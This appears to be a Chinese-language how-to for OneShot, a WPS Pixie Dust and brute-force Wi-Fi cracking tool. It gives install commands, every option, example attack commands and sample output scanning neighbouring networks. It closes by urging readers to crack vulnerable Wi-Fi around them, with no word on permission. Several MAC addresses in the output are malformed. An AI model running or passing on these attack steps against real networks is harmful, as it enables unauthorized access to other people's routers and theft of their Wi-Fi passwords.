概述特征要求设置Debian/Ubuntu/kali 安装依赖 sudo apt install -y python3 wpasupplicant iw wget
安装小精灵 Ubuntu 18.04 及更高版本或 Debian 10 及更高版本 sudo apt install -y pixiewps
获取OneShot
运行 sudo python OneShot/oneshot.py -i wlan0 --iface-down -K
用法
oneshot.py <arguments>
Required arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts [0]
-w, --write : Write AP credentials to the file on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Alway print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
使用示例在指定的BSSID上启动小精灵尘埃攻击: sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
显示可用网络并在指定网络上启动 Pixie Dust 攻击: sudo python3 oneshot.py -i wlan0 -K
使用指定的PIN的前半部分启动在线WPS暴力破解: sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
启动WPS按钮连接:s sudo python3 oneshot.py -i wlan0 --pbc
使用效果
# 执行仙尘攻击
╰─ sudo python oneshot.py -i wlan0 --iface-down -K Running wpa_supplicant… BSSID not specified (--bssid) — scanning for available networks
Network marks: Possibly vulnerable | WPS locked | Already stored
Networks list:
# BSSID ESSID Sec. PWR WSC device name WSC model
1) 4A:F8:FF:73:7F:89 WPA2 -76
2) 58:BE:72:1C:0F:A8 CU_S5wj WPA/WPA2 -76
3) 48:F8:FF:53:7F:89 CMCC-9cmM WPA2 -80 RalinkAPS_0 Ralink Wireless Access Point RT2860
4) 4A:F8:FF:33:7F:89 CMCC-QLINK Open -82
5) E87:65:B2:8C:1C CU_Fe63_5G WPA/WPA2 -83 huawei_ONT WAP 123
6) 94:F8:27:7A:EC:92 ChinaNet-EC8E WPA/WPA2 -84
7) 14:89:CB:16:B2:A4 CU_Fe63_5G WPA/WPA2 -84 huawei_ONT WAP 123
8) 70:423:56:40:92 CMCC-ppSG WPA2 -86
9) 4A:F8:FF:13:7F:89 CMCC-GUIDE-LINK WPA2 -87 RalinkAPS_1 Ralink Wireless Access Point RT2860
破解一个WiFi只需要0.89秒,如果你周围存在这种易受攻击的WiFi,试试仙尘攻击吧!!!!! 绿色表示易受攻击 选择目标9,回车
破解完毕,wpa-psk为密码,wps-pin为PIN码!!!
|